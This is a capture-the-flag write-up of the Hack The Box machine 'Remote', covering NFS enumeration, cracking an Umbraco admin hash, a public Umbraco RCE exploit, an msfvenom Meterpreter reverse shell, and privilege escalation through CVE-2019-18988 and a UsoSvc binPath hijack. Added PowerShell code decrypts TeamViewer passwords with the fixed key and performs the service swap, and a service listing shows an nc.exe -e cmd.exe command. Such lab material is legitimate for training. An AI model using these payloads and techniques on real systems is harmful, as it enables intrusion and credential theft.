Hack The Box - Remote


Remote features an instance of Umbraco CMS that is vulnerable to an authenticated remote code execution (RCE). It starts with enumerating a public NFS share to find a set of credentials, which give me a foothold on the system. Internal enumeration with WinPEAS finds two privilege escalation vectors: TeamViewer7 and service abuse. TeamViewer7 is vulnerable to CVE-2019-18988, and the Metasploit module for that CVE recovers the stored TeamViewer password, which is reused by the administrator account. As an alternative, the user has full access to the UsoSvc service, which can be abused to gain SYSTEM access.

Skills Learned

  • NFS enumeration
  • Umbraco CMS 7.12.4 exploitation
  • Metasploit


  • Kali Linux (Attacking Machine) - https://www.kali.org/
  • Nmap - Preinstalled in Kali Linux
  • metasploit - Preinstalled in Kali Linux
  • nfs-common - apt install nfs-common



→ root@iamf «remote» «»
$ nmap -sC -sV -oA scans/initial-remote ''
  • -sC, run the default NSE scripts
  • -sV, probe open ports for service versions
  • -oA, save the output in all three formats (nmap, gnmap, xml)
  • -v, verbose mode (optional; not used in the command above)
... <snip> ...
Host is up (0.20s latency).
Not shown: 993 closed ports
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home — Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000) 
| rpcinfo: 
| program version port/proto service 
| 100000 2,3,4 111/tcp rpcbind 
| 100000 2,3,4 111/tcp6 rpcbind 
| 100000 2,3,4 111/udp rpcbind 
| 100000 2,3,4 111/udp6 rpcbind 
| 100003 2,3 2049/udp nfs 
| 100003 2,3 2049/udp6 nfs 
| 100003 2,3,4 2049/tcp nfs 
| 100003 2,3,4 2049/tcp6 nfs 
| 100005 1,2,3 2049/tcp mountd 
| 100005 1,2,3 2049/tcp6 mountd 
| 100005 1,2,3 2049/udp mountd 
| 100005 1,2,3 2049/udp6 mountd 
| 100021 1,2,3,4 2049/tcp nlockmgr 
| 100021 1,2,3,4 2049/tcp6 nlockmgr 
| 100021 1,2,3,4 2049/udp nlockmgr 
| 100021 1,2,3,4 2049/udp6 nlockmgr 
| 100024 1 2049/tcp status 
| 100024 1 2049/tcp6 status 
| 100024 1 2049/udp status 
|_ 100024 1 2049/udp6 status 
135/tcp open msrpc Microsoft Windows RPC 
139/tcp open netbios-ssn Microsoft Windows netbios-ssn 
445/tcp open microsoft-ds? 
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -25s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2020-03-28T21:04:26
|_ start_date: N/A
... <snip> ...

The result shows a bunch of open ports.


TCP 21 - FTP

Anonymous login is allowed, but the share is empty.

TCP 80 - Website


In the Contact menu there is a button that points to


The link led me to the Umbraco login page.

Trying some common credentials with Burp didn't produce any different response.

TCP 2049 - NFS

NFS shares can be enumerated using the showmount command.

If you don’t have it, install with sudo apt install nfs-common

→ root@iamf «remote» «»
$ showmount -e ''
Export list for

The export is accessible to everyone, so I can mount it on my Kali box.

→ root@iamf «remote» «»
$ mount -t nfs /mnt/iamf

Running find on the mounted share turns up two interesting files: umbraco.config and umbraco.sdf.

→ root@iamf «iamf» «»
$ find . -type f 2>/dev/null


umbraco.config is an XML configuration file and umbraco.sdf is a SQL Server Compact database.


The config file doesn’t store credentials.

The database file is binary, so strings piped into grep is the quickest way to pull out readable text, such as anything mentioning “admin”.

→ root@iamf «remote» «»
$ strings App_Data/umbraco.sdf | grep -i admin

User “admin” <admin@htb.local> “admin” <admin@htb.local>umbraco/user/password/changepassword change
User “admin” <admin@htb.local> “admin” <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User “SYSTEM” “admin” <admin@htb.local>umbraco/user/saveupdating LastLoginDate, 

From the output above I can only guess that this is the right username and password-hash pair: admin@htb.local:b8be16afba8c314ad33d812f22a04991b90e2aaa

The 40 hex characters identify the hash as SHA-1, and it cracks online on CrackStation. The password is baconandcheese.
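As an added example (not part of the original write-up), here is a PowerShell stand-in for the strings | grep step above that also flags anything shaped like a password hash next to an account name, and that additionally scans UTF-16LE runs (what `strings -e l` would show), since SQL Server Compact stores nvarchar columns that way. The byte sample is constructed for the demo and only mimics the shape of what the real umbraco.sdf gave up; the function and variable names are my own.

```powershell
# Added example, not from the original write-up: a PowerShell stand-in for
# `strings App_Data/umbraco.sdf | grep -i admin` that also flags what looks like a
# password hash next to an account name. The sample bytes are constructed for the
# demo; a real umbraco.sdf is a SQL Server Compact file and contains far more.

function Get-PrintableStrings {
    param(
        [Parameter(Mandatory)][byte[]] $Bytes,
        [int] $MinLength = 8
    )
    # Map each byte to one Latin-1 char so a regex can run directly over the raw data.
    $text = [System.Text.Encoding]::GetEncoding(28591).GetString($Bytes)
    # Single-byte printable runs (what GNU strings prints by default) ...
    foreach ($m in [regex]::Matches($text, "[\x20-\x7E]{$MinLength,}")) { $m.Value }
    # ... plus UTF-16LE runs (what `strings -e l` prints), which SQL Server Compact uses for nvarchar.
    foreach ($m in [regex]::Matches($text, "(?:[\x20-\x7E]\x00){$MinLength,}")) { $m.Value -replace "`0", '' }
}

function Find-CredentialStrings {
    param([Parameter(Mandatory)][byte[]] $Bytes)
    # Hash type guessed from length alone; this narrows the search, it does not prove the algorithm.
    $hashLengths = @{ 32 = 'MD5/NTLM-sized'; 40 = 'SHA-1-sized'; 64 = 'SHA-256-sized'; 128 = 'SHA-512-sized' }
    $emailRe = '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'
    # Lookarounds force a maximal hex run; a hash glued to other hex-looking text will be missed.
    $hexRe   = '(?<![0-9A-Fa-f])[0-9A-Fa-f]{32,128}(?![0-9A-Fa-f])'
    foreach ($s in Get-PrintableStrings -Bytes $Bytes) {
        $emails = @([regex]::Matches($s, $emailRe) | ForEach-Object { $_.Value } | Select-Object -Unique)
        $hashes = @([regex]::Matches($s, $hexRe) | ForEach-Object { $_.Value } |
                    Where-Object { $hashLengths.ContainsKey($_.Length) } |
                    ForEach-Object { '{0} ({1})' -f $_, $hashLengths[$_.Length] })
        if ($emails.Count -or $hashes.Count) {
            [pscustomobject]@{ Emails = $emails; Hashes = $hashes; Source = $s }
        }
    }
}

# Constructed sample: a few bytes of binary noise around strings shaped like the
# audit-log entries and the user row that the real umbraco.sdf gave up to `strings`.
$ascii  = [System.Text.Encoding]::ASCII
$sample = [System.Collections.Generic.List[byte]]::new()
$sample.AddRange([byte[]](0x00, 0x01, 0xFF, 0x10))
$sample.AddRange($ascii.GetBytes('User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success'))
$sample.AddRange([byte[]](0x00, 0x7F, 0x00))
$sample.AddRange($ascii.GetBytes('admin@htb.local b8be16afba8c314ad33d812f22a04991b90e2aaa'))
$sample.AddRange([byte[]](0x00, 0x00))
$sample.AddRange([System.Text.Encoding]::Unicode.GetBytes('umbracoUser table, nothing useful'))

Find-CredentialStrings -Bytes $sample.ToArray() | Format-List
# Against the real file mounted from the NFS share:
# Find-CredentialStrings -Bytes ([System.IO.File]::ReadAllBytes('App_Data/umbraco.sdf')) | Format-List
```

This runs under pwsh on Kali as well as on Windows. The length table is deliberately only a hint: a 40-hex-character string is SHA-1-sized, but nothing in the file proves which algorithm produced it, which is why the next step is still to try it on CrackStation.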



Shell as IIS apppool

Access on Umbraco CMS

The credential can be used on Umbraco CMS.


The CMS version is shown in the menu on the left. A quick Google search shows that this version has a public authenticated RCE exploit.

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution, webapps exploit for the ASPX platform, from Offensive Security's Exploit Database (www.exploit-db.com).

I copied the exploit and ran it.

→ root@iamf «Umbraco-RCE» «»
$ python exploit.py -u admin@htb.local -p baconandcheese -i -c powershell.exe -a 'ls c:/'

Persistent Shell - Meterpreter

I can upgrade the RCE to a persistent shell either by sending a PowerShell one-liner payload or by crafting a payload with msfvenom.

I don't remember exactly, but I think I messed up the one-liner, so I went with msfvenom.

Umbraco's media upload doesn't restrict .exe files. Uploads are managed under /media in the CMS and land on disk at C:/inetpub/wwwroot/media/[itemID]/payload.exe


I'll generate an executable reverse shell, upload it through the Umbraco /media page, and start a Metasploit handler listening on the chosen port.

→ root@iamf «remote» «»
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -a x86 -f exe > fremote.exe

Then I’ll just execute my payload on C:/inetpub/wwwroot/media/1136/fremote.exe

→ root@iamf «remote» «»
$ python exploit.py -u admin@htb.local -p baconandcheese -i -c cmd.exe -a 'C:/inetpub/wwwroot/media/1136/fremote.exe'

I can spawn an interactive PowerShell from the Meterpreter session with the following (the -i flag attaches the new process to the session; without it, Meterpreter only starts the process and returns):

meterpreter > execute -f powershell.exe -i

Privilege Escalation

Shell as Administrator

For the last part, I have two options to gain Administrator or SYSTEM access: TeamViewer7 (CVE-2019-18988) and abusing the UsoSvc service. For UsoSvc, I'm still unsure whether it came with the box or was left by other players, but I'll show both.

TeamViewer7 CVE-2019-18988

WinPEAS shows that a TeamViewer7 service is running. This version is vulnerable to CVE-2019-18988.

From https://nvd.nist.gov/vuln/detail/CVE-2019-18988:

It used a shared AES key for all installations since at least as far back as v7.0.43148, and used it for at least OptionsPasswordAES in the current version of the product

========================================(Services Information)========================================
... <snip> ... 
    TeamViewer7(TeamViewer GmbH - TeamViewer 7)["C:\Program Files (x86)\TeamViewer\Version7\TeamViewer_Service.exe"] - Auto - Running
    TeamViewer Remote Software
    UsoSvc(Update Orchestrator Service)[cmd \c C:\Users\nc.exe 4444 -e cmd.exe] - Auto - Stopped - No quotes and Space detected
    Manages Windows Updates. If stopped, your devices will not be able download and install latest udpates.
... <snip> ... 

Metasploit has a post module for this CVE, so I can run it straight from the Meterpreter session.

meterpreter > run post/windows/gather/credentials/teamviewer_passwords
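To show what the module is actually doing, here is an added PowerShell example (mine, not the Metasploit module and not from the original write-up) that decrypts TeamViewer's stored *PasswordAES registry values with the fixed AES-128-CBC key and IV that CVE-2019-18988 describes; the key and IV are the publicly documented constants that the teamviewer_passwords module uses. The registry paths and value names are my assumptions about a typical 32-bit TeamViewer 7 install and may differ on another host; the encrypt-side helper exists only so the demo can build a sample and run offline.

```powershell
# Added example, not from the original write-up and not the Metasploit module:
# decrypt TeamViewer's *PasswordAES registry values with the fixed key/IV behind
# CVE-2019-18988. Key and IV are the published constants for this CVE.

$TvKey = [byte[]](0x06,0x02,0x00,0x00,0x00,0xA4,0x00,0x00,0x52,0x53,0x41,0x31,0x00,0x04,0x00,0x00)
$TvIV  = [byte[]](0x01,0x00,0x01,0x00,0x67,0x24,0x4F,0x43,0x6E,0x67,0x62,0xF2,0x5E,0xA8,0xD7,0x04)

function New-TvCipher {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::None   # stored values are whole blocks, no PKCS#7
    $aes.Key = $TvKey
    $aes.IV  = $TvIV
    $aes
}

function ConvertFrom-TvPassword {
    param([Parameter(Mandatory)][byte[]] $CipherText)
    if ($CipherText.Length % 16 -ne 0) { throw 'ciphertext is not a multiple of the AES block size' }
    $aes = New-TvCipher
    try { $plain = $aes.CreateDecryptor().TransformFinalBlock($CipherText, 0, $CipherText.Length) }
    finally { $aes.Dispose() }
    # The plaintext is UTF-16LE text followed by NUL bytes up to the block boundary.
    [System.Text.Encoding]::Unicode.GetString($plain).TrimEnd([char]0)
}

function ConvertTo-TvPassword {
    # Encrypt side, used here only to build a sample so the demo runs offline.
    param([Parameter(Mandatory)][string] $Password)
    $bytes  = [System.Text.Encoding]::Unicode.GetBytes($Password + [char]0)
    $padded = New-Object byte[] ([int][math]::Ceiling($bytes.Length / 16) * 16)
    [Array]::Copy($bytes, $padded, $bytes.Length)
    $aes = New-TvCipher
    try { Write-Output -NoEnumerate $aes.CreateEncryptor().TransformFinalBlock($padded, 0, $padded.Length) }
    finally { $aes.Dispose() }
}

function Get-TvStoredPasswords {
    # Assumed locations for a 32-bit TeamViewer 7 on 64-bit Windows; adjust for the host.
    $paths = 'HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7',
             'HKLM:\SOFTWARE\WOW6432Node\TeamViewer',
             'HKLM:\SOFTWARE\TeamViewer\Version7',
             'HKLM:\SOFTWARE\TeamViewer'
    $names = 'OptionsPasswordAES', 'SecurityPasswordAES', 'SecurityPasswordExported',
             'ServerPasswordAES', 'ProxyPasswordAES', 'LicenseKeyAES'
    foreach ($p in $paths) {
        if (-not (Test-Path $p)) { continue }
        $item = Get-ItemProperty -Path $p
        foreach ($n in $names) {
            $blob = $item.$n                       # REG_BINARY comes back as byte[]
            if ($blob -is [byte[]] -and $blob.Length -gt 0) {
                [pscustomobject]@{ Path = $p; Name = $n; Plaintext = (ConvertFrom-TvPassword -CipherText $blob) }
            }
        }
    }
}

# Offline round trip with a constructed sample (the box's password, as recovered later).
$sample = ConvertTo-TvPassword -Password '!R3m0te!'
ConvertFrom-TvPassword -CipherText $sample      # -> !R3m0te!
# On the target: Get-TvStoredPasswords | Format-Table -AutoSize
```

The point the example makes is the one in the NVD text: because every installation shares the key and IV, read access to HKLM (which the IIS application pool account has) is all that is needed to recover the password, no TeamViewer privileges involved.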


Remote Access - Evil-WinRM

The recovered password is reused by the administrator account.

→ root@iamf «remote» «»
$ evil-winrm -u administrator -p '!R3m0te!' -i htb.remote


(Alternative) Abusing UsoSvc service

If this service was set up like this by the box itself, I can just point the UsoSvc executable path at the payload I uploaded earlier (note the space after binPath=, which sc.exe requires):

PS C:\> sc.exe config usosvc binPath= "C:/inetpub/wwwroot/media/1136/fremote.exe"

I'll set up a netcat listener on port 4444. (fremote.exe is a staged Meterpreter payload, so in practice it needs a Metasploit multi/handler on 4444 rather than plain nc; nc only works with a stageless payload such as windows/shell_reverse_tcp.)

→ root@iamf «remote» «»
$ nc -nvlp 4444

Now on Remote, I can just start the service.

PS C:\> sc.exe start usosvc

I don’t have any screenshots, but that should work.
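As an added example (my code, not from the original write-up), the following PowerShell checks whether a token can both reconfigure and start a service, which are the two rights the UsoSvc trick depends on, and then performs the binPath swap with the original value saved and restored. It lets .NET parse the SDDL that sc.exe sdshow prints, so aliases such as AU and BA resolve to real SIDs. The sample descriptor is constructed for the demo; the function names and the 'S-1-5-21-...' user SID are mine.

```powershell
# Added example, not from the original write-up: decide whether the current token
# can reconfigure *and* start a service (the two rights the UsoSvc trick needs),
# then perform the swap with the original binPath saved and restored. The SDDL
# below is constructed for the demo in the shape `sc.exe sdshow` prints.

$SERVICE_CHANGE_CONFIG = 0x0002        # SDDL letters "DC" on a service object
$SERVICE_START         = 0x0010        # SDDL letters "RP" on a service object
$GENERIC_ALL           = 0x10000000    # SDDL letters "GA"

function Get-ServiceAccessMask {
    param(
        [Parameter(Mandatory)][string] $Sddl,
        [Parameter(Mandatory)][string[]] $Sids   # SIDs the principal holds (user + groups)
    )
    # Let .NET parse the SDDL; aliases such as AU/BA/SY come back as real SIDs.
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    $allowed = 0; $denied = 0
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($Sids -notcontains $ace.SecurityIdentifier.Value) { continue }
        if ($ace.AceType -eq [System.Security.AccessControl.AceType]::AccessAllowed) {
            $allowed = $allowed -bor $ace.AccessMask
        } elseif ($ace.AceType -eq [System.Security.AccessControl.AceType]::AccessDenied) {
            $denied = $denied -bor $ace.AccessMask
        }
    }
    # A matching Deny ACE removes the right even if another ACE allows it.
    $allowed -band (-bnot $denied)
}

function Test-ServiceHijackable {
    param([Parameter(Mandatory)][string] $Sddl, [string[]] $Sids)
    if (-not $Sids) {   # default to the current token
        $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
        $Sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    }
    $mask = Get-ServiceAccessMask -Sddl $Sddl -Sids $Sids
    if ($mask -band $GENERIC_ALL) { return $true }
    [bool](($mask -band $SERVICE_CHANGE_CONFIG) -and ($mask -band $SERVICE_START))
}

function Invoke-ServiceBinPathSwap {
    # Run on the target once the check passes. Saves the real binPath, points the
    # service at the payload, starts it, then puts the original back.
    param([string] $Name = 'UsoSvc', [Parameter(Mandatory)][string] $Payload)
    $orig = (Get-CimInstance Win32_Service -Filter "Name='$Name'").PathName
    & sc.exe config $Name binPath= $Payload | Out-Null
    # The payload never talks to the SCM, so this blocks about 30 s and then returns
    # error 1053. The shell has already fired as SYSTEM by then, but it may be killed
    # when the SCM gives up, so spawn a separate process from it right away.
    & sc.exe start $Name | Out-Null
    & sc.exe config $Name binPath= $orig | Out-Null
    $orig
}

# Constructed descriptor: SYSTEM and Administrators (BA) hold full control, Interactive
# users (IU) only read rights, and Authenticated Users (AU) have been granted
# change-config + start + stop, the kind of misconfiguration this box has on UsoSvc.
$sampleSddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
              '(A;;CCLCSWLOCRRC;;;IU)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)'
Test-ServiceHijackable -Sddl $sampleSddl -Sids @('S-1-5-21-1-2-3-1001', 'S-1-5-11')   # True  (AU is S-1-5-11)
Test-ServiceHijackable -Sddl $sampleSddl -Sids @('S-1-5-21-1-2-3-1001', 'S-1-5-4')    # False (IU is S-1-5-4)

# On the target, against the live service and the current token:
# Test-ServiceHijackable -Sddl ((sc.exe sdshow UsoSvc | Where-Object { $_ }) -join '')
# Invoke-ServiceBinPathSwap -Name UsoSvc -Payload 'C:\inetpub\wwwroot\media\1136\fremote.exe'
```

Restoring the original binPath matters on a shared box: leaving UsoSvc pointed at a payload is exactly how the nc.exe entry in the WinPEAS output above ends up confusing the next player.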